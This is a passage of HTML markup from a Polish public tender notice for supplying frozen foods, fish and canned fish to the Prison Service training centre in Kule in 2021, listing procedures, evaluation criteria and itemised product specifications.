id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz wykonanych dostaw według wzoru stanowiącego załącznik nr 4 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wypełniony i podpisany formularz oferty - załącznik nr 1. 2. Wypełniony i podpisany formularz cenowy w zakresie wybranych zadań do 1 do 4 - załączniki nr 2 do 2c. 3. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Najkrótszy czas wymiany wadliwego towaru</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Dodatkowa dostawa o minimalnej kwocie od jakiej wykonawca zrealizuje zamówienie złożone przez zamawiającego</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-11-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Ofertę nalezy sporządzić w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawy mrożonek dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach w 2021 r.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Pyzy z mięsem	15896000-5	Opakowanie jednostkowe 400 - 500 g. Ciasto - skład: ciasto nie mniej niż:- ziemniaki gotowane 37%, woda, grys ziemn.23%, skrobia ziemniaczana, sól. Farsz nie mniej niż: mięso gotowane wieprzowe 32%, wołowe 32%, cebula duszona, tłuszcz wieprzowy, błonnik 3,2%, sól, przyprawy. Zawartość w wyrobie: mięsa nie mniej niż 12%, ziemniaków 30 %, grysu 18,5%, farszu nie mniej niż 20%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	200 kg2	Brokuły	15331170-9	Op. Jedn. 400-1000g. Produkt głęboko mrożony. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	250 kg3	Frytki	15311100-2	Op. Jedn. 2-2,5 kg. Szybko smażące frytki karbowane podsmażone i zamrożone. Składniki: ziemniaki, olej roślinny, dextroza. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	350 kg4	Mieszanka owocowa	15896000-5	Op.jedn. 400-500g. Produkt naturalny głęboko mrożony. Skład: Owoce ( truskawki, śliwki, porzeczki, wiśnie, agrest, aronie) w różnych proporcjach. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	600 kg5	Mieszanka warzywna 7 składnikowa	15331170-9	Op.jedn.400-600g. Produkt głeboko mrożony. Skład: marchew, kalafior, fasola szparag.pietruszka, seler, cebula, groch zielony. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	300 kg6	Szpinak	15331170-9	Op.jedn. 400-500g. Produkt rozdrobniony głęboko mrożony. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	60 kg7	Warzywa na patelnię	15331170-9	Op.jedn. 400-600g. Mieszanka warzywna o składzie: kalafior, marchew, brokuły, seler, cebula, kapusta biała, groch zielony, kukurydza, Produkt głeboko mrożony. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. 350 kg8	Pierogi z serem	15896000-5	Op.jedn. 400-600g. Pierogi domowe, ręcznie robione, głęboko mrożone. Skład: ser twarogowy nie mniej niż 40%, mąka pszenna, woda, cukier, jaja, cukier waniliowy. Minimalna zawartość nadzienia nie mniej niż 40%. Produkt nie powinien zawierać barwników. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	250 kg9	Pierogi z kapustą i grzybami	15896000-5	Op.jedn. 400-600g. Skład: mąka pszenna, kapusta kwaszona nie mniej niż27%, woda, grzyby leśne nie mniej niż 7%, tłuszcz roślinny, przyprawy, cebula, jaja. Zawartość nadzienia min.40%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	50 kg10	Uszka z mięsem	15896000-5	Op.jedn. 400-500g. Produkt głęboko mrożony. Skład: mąka pszenna, minimalna zawartość mięsa wołowego 24 %, woda, bułka tarta, jaja, cebula, przyprawy. Minimalna zawartość nadzienia 28 %. Produkt nie zawierający barwników. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. 80 kg11	Pizza mrożona	15896000-5	Skład: Spód: mąka, woda, olej, cukier, sól, drożdże. 8,2% ser (edamski, mozzarella), 8,00% szynka , 6,00 %pieczarki , 5,1 % sos (śmietana, olej, woda), 1,6%czosnek , cebula, przyprawy. Masa netto 250-300g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	500 kg12	Knedle z owocami	15896000-5	Op.jedn 400-500g. Skład: ciasto: ziemniaki gotowane nie mniej niż 54,8 %, mąka pszenna nie mniej niż18 %, woda, skrobia ziemniaczana nie mniej niż 9%, płatki ziemniaczane, sól. Farsz:: truskawki mrożone nie mniej niż 79,8% lub śliwki mrożone nie mniej niż 79,8%, cukier, zagęszczacz. Zawartość w wyrobie nie mniej niż: truskawki lub śliwki 16%, ziemniaki do 11%, mąka pszenna do 3,6 %, farsz nie mniej niż 20 %. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. 200 kg13	Kalafior	15331170-9	Kalafior różyczki. Skład: Kalafior 100%. Produkt głęboko mrożony. Waga 400-600g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	300 kg14	Fasolka szparagowa	15331170-9	Fasola szparagowa cięta. Produkt głęboko mrożony. Waga 400-600g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	300 kg15	Krokiety z mięsem	15896000-5	Op.jedn 2-2,5 kg. Skład: Ciasto- woda, mąka pszenna, mleko w proszku odtłuszczone, jajka, sól. Farsz - mięso wołowe i wieprzowe mniej niż po 34%. Panierka - bułka tarta. Zawartość w wyrobie: mięso nie mniej niż 20,4%, farsz nie mniej niż 30 %. Waga 1 szt 60-150g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	100 kg16	Kartacze z mięsem	15896000-5	Op.jedn. 2-2,5kg. Skład: Ciasto- ziemniaki gotowane do 37%, woda, grys ziemniaczany do 23%, skrobia ziemniaczana, sól. Farsz - mięso gotowane wieprzowe nie mniej niż 32%, wołowe nie mniej niż 32%, cebula duszona, tłuszcz wieprzowy, błonnik 3,2 %, sól, przyprawy. Zawartość w wyrobie nie mniej niż mięsa 12,8%, ziemniaków 30%, grysu 18,5%, farsz 20%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	200 kg17	Kukurydza mrożona	15331170-9	Op.jedn. 2-2,5kg. Mrożone ziarno kukurydzy. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	20 kg18	Papryka mrożona	15331170-9	Op.jedn.2-2,5kg. Papryka mrożona cięta czerwona lub kolorowa. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	20 kg19	Frytki - kuleczki	15311100-2	Op.jedn 2-2,5kg. Szybko smażące frytki kuleczki o różnych smakach. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	350 kg20	Marchew - mini mrożona	15331170-9	Op.jedn.400-550g. Skład: marchew mini 100%. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	350 kg21	Bukiet warzyw kwiatowy	15331170-9	Op.jedn. 400-550g. Skład: brokuł, kalafior, marchew. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	350 kg22	Ciasto francuskie mrożone	15811300-9	Op.jedn 400-500g. Skład: mąka pszenna, woda, tłuszcz roślinny, oleje roślinne: rzepakowy i słonecznikowy, sól. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	100 kg23	Brukselka	15331170-9	Kapusta brukselska 100%. Op. 400-600g. Produkt głęboko mrożony. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	200 kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, 15896000-5, 15331170-9, 15311100-2, 15811300-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najkrótszy czas wymiany wadliwego towaru</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Dodatkowa dostawa o minimalnej kwocie od jakiej wykonawca zrealizuje zamówienie złożone przez zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawy ryb i konserw rybnych dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach w 2021 r. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Filet śledziowy a la matias	15241200-1	Skład: filet śledziowy, sól, ocet, zaprawa śledziowa. Masa 5 kg, masa ryby 4 kg. Termin przydatności do spożycia : nie krótszy niż 30 dni od daty dostawy.	200 kg 2	Filet z dorsza SHP	15220000-6	Filety z dorsza. Shatter pack. ( nie dopuszcza się JQF), bez obcych zanieczyszczeń, po rozmrożeniu maksymalny ubytek masy nie więcej niż 5%, barwa mięsa charakterystyczna dla danego gatunku. Produkt głęboko mrożony. Opakowania: kartony od 6 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	500 kg3	Tuńczyk w oleju	15243000-3	Jasne mięso tuńczyka. Duże kawałki. Skład: tuńczyk duże kawałki, olej roślinny, sól. Masa netto 170-200g, masa po odcieku nie mniej niż 120g. Termin przydatności do spożycia nie krótszy niż 6 miesięcy od daty dostawy.	100 kg4	Kostka rybna panierowana	15243000-3	Skład: ryba- nie mniej niż 55%. Masa jednej porcji od 110 do 150 g Opakowanie do 5 kg. Termin przydatności do spożycia nie krótszy niż 6 miesięcy.	100 kg5	Szprot w sosie pomidorowym	15240000-2	Skład: szprot nie mniej niż 40%, sos pomidorowy : woda, koncentrat pomidorowy, cukier, sól spożywcza, ocet spirytusowy, skrobia modyfikowana, mąka pszenna, olej roślinny, seler, pietruszka, przyprawy. Masa netto300-350g. Termin przydatności do spożycia nie krótszy niż 6 miesięcy od daty dostawy.	120 kg6	Łosoś wędzony	15234000-7	Łosoś wędzony plastry. Skład: ryba łosoś, sól, cukier. Pakowany próżniowo Op.jedn. 90-120g. Termin do spożycia do 20 dni liczony od daty dostawy.	3 kg7	Pasta rybna	15243000-3	Pasta rybna : z tuńczyka, z łososia, z makreli. Op. Jedn. 80-100g. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	2 kg8	Kawior 15244100-1	Kawior drobnoziarnisty czarny i czerwony. Skład: ikra 91 %, sól, cukier. Op. Jedn. 80-100g. Termin przydatności do spożycia nie krótszy niż 3 miesiące od daty dostawy.	1 kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, 15241200-1, 15220000-6, 15243000-3, 15240000-2, 15234000-7, 15244100-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: 